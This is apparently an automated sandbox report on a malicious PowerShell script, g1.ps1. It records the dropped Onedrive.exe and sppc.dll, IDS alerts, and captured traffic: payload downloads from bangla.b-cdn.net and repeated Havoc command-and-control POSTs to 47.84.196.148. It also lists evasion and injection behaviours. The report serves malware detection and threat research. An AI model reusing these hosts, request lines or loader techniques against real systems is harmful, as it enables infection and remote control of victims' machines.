Edit tour

Windows Analysis Report
g1.ps1

Overview

General Information

Sample name:	g1.ps1
Analysis ID:	1578250
MD5:	78e07513650c1a45dcd2b15ab20d3691
SHA1:	6066bd405222b5ebf50910dca44864f76bdc34ae
SHA256:	6750a7e6eb02eecab234f42a6cc6a88c1510d557336d53a85c02ad43776d8cb9
Tags:	ps1ScamTransaction7350user-JAMESWT_MHT
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

AI detected suspicious sample

Powershell drops PE file

Sets debug register (to hijack the execution of another thread)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

powershell.exe (PID: 5324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Onedrive.exe (PID: 5036 cmdline: "C:\Users\user\AppData\Local\Temp\Onedrive.exe" MD5: 32C31F06E0B68F349F68AFDD08E45F3D)

cleanup

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", ProcessId: 5324, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1", ProcessId: 5324, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Havoc Demon CnC Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T13:36:22.689457+0100	2056539	1	Malware Command and Control Activity Detected	192.168.2.5	49709	47.84.196.148	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T13:36:16.330798+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	89.35.237.170	80	TCP
2024-12-19T13:36:18.473200+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	89.35.237.170	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: unknown	HTTPS traffic detected: 89.35.237.170:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49985 version: TLS 1.2

Source:	Binary string: C:\Users\dell\Downloads\tamperedsyscallshellcodeinfile\x64\Release\tampered.pdb source: Onedrive.exe, 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmp, sppc.dll.0.dr
Source:	Binary string: phoneactivate.pdb source: powershell.exe, 00000000.00000002.2268244875.0000022F7F419000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe, 00000003.00000000.2233891547.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe.0.dr
Source:	Binary string: phoneactivate.pdbGCTL source: powershell.exe, 00000000.00000002.2268244875.0000022F7F419000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe, 00000003.00000000.2233891547.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe.0.dr

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe

Code function: 3_2_00007FF8A0327470 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,

3_2_00007FF8A0327470

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2056539 - Severity 1 - ET MALWARE Havoc Demon CnC Request : 192.168.2.5:49709 -> 47.84.196.148:443

Source: Joe Sandbox View

IP Address: 89.35.237.170 89.35.237.170

Source: Joe Sandbox View

ASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 89.35.237.170:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 89.35.237.170:443

Source: global traffic	HTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global traffic	HTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0Content-Length: 282Host: 47.84.196.148
Source: global traffic	HTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global traffic	HTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global traffic	HTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global traffic	HTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global traffic	HTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global traffic	HTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: /User-Agent: Mozilla/5.0Content-Length: 20Host: 47.84.196.148
Source: global traffic	HTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net

Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148
Source: unknown	TCP traffic detected without corresponding DNS query: 47.84.196.148

Source: global traffic	HTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net
Source: global traffic	HTTP traffic detected: GET /onedrive.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sppc.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bangla.b-cdn.net

Source: global traffic

DNS traffic detected: DNS query: bangla.b-cdn.net

Source: unknown

HTTP traffic detected: POST /reports HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: */*User-Agent: Mozilla/5.0Content-Length: 282Host: 47.84.196.148

Source: powershell.exe, 00000000.00000002.2238529101.0000022F0195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F016B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bangla.b-cdn.net
Source: powershell.exe, 00000000.00000002.2238529101.0000022F016B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bangla.b-cdn.net/onedrive.dll
Source: powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bangla.b-cdn.net/sppc.dll
Source: powershell.exe, 00000000.00000002.2256795044.0000022F101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Onedrive.exe	String found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2266730581.0000022F7F1A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604709979.0000021BD8DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.84.196.148/
Source: Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.84.196.148/GZ;~
Source: Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.84.196.148/V
Source: Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.84.196.148/o
Source: Onedrive.exe, 00000003.00000003.3901525733.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137274150.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901565556.0000021BD8DC7000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604903050.0000021BD8DAF000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901688629.0000021BD8DCC000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3136786618.0000021BD8DCA000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901734447.0000021BD8D89000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323944839.0000021BD8D7B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4324280737.0000021BD8DAF000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.2965471763.0000021BD8DC7000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3604759616.0000021BD8D9B000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D08000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3901434763.0000021BD8D9E000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4567512777.0000021BD8DB0000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137481473.0000021BD8DCD000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323820077.0000021BD8D9E000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4324317853.0000021BD8D89000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.2965862283.0000021BD8DBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.84.196.148/reports
Source: Onedrive.exe, 00000003.00000002.4567512777.0000021BD8DB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.84.196.148/reports=
Source: Onedrive.exe, 00000003.00000003.4324280737.0000021BD8DAF000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.4323820077.0000021BD8D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.84.196.148/reportsF
Source: Onedrive.exe, 00000003.00000003.3136786618.0000021BD8DCA000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.2965471763.0000021BD8DC7000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000003.3137481473.0000021BD8DCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.84.196.148/reportsX
Source: Onedrive.exe, 00000003.00000002.4567512777.0000021BD8D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://47.84.196.148:443/reports
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bangla.b-cdn.net
Source: powershell.exe, 00000000.00000002.2238529101.0000022F01942000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bangla.b-cdn.net/onedrive.dll
Source: powershell.exe, 00000000.00000002.2238529101.0000022F0195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2238529101.0000022F01985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bangla.b-cdn.net/sppc.dll
Source: powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2238529101.0000022F00232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2238529101.0000022F014D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2256795044.0000022F101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256795044.0000022F10073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965

Source: unknown	HTTPS traffic detected: 89.35.237.170:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49984 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 47.84.196.148:443 -> 192.168.2.5:49985 version: TLS 1.2

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\sppc.dll			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\Onedrive.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F80020 NtAllocateVirtualMemory,NtProtectVirtualMemory,	3_3_0000021BD8F80020
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A0301010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle,	3_2_00007FF8A0301010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A0301960 NtAccessCheck,	3_2_00007FF8A0301960

Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F8876F	3_3_0000021BD8F8876F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F8A71A	3_3_0000021BD8F8A71A
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F958AF	3_3_0000021BD8F958AF
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F80BDF	3_3_0000021BD8F80BDF
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F8C13F	3_3_0000021BD8F8C13F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_3_0000021BD8F9764F	3_3_0000021BD8F9764F
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104F1384	3_2_00007FF6104F1384
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104FD98C	3_2_00007FF6104FD98C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104FC214	3_2_00007FF6104FC214
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104F8E4C	3_2_00007FF6104F8E4C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104F5E74	3_2_00007FF6104F5E74
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104F7B1C	3_2_00007FF6104F7B1C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104FA33C	3_2_00007FF6104FA33C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104F7010	3_2_00007FF6104F7010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104F57D0	3_2_00007FF6104F57D0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104FACA4	3_2_00007FF6104FACA4
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104F6454	3_2_00007FF6104F6454
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104FE048	3_2_00007FF6104FE048
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104F892C	3_2_00007FF6104F892C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF6104F8CE0	3_2_00007FF6104F8CE0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A031B5A0	3_2_00007FF8A031B5A0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A0301010	3_2_00007FF8A0301010
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A031A310	3_2_00007FF8A031A310
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A03323A0	3_2_00007FF8A03323A0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A031C6DE	3_2_00007FF8A031C6DE
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A031A8F0	3_2_00007FF8A031A8F0
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe	Code function: 3_2_00007FF8A0301960	3_2_00007FF8A0301960
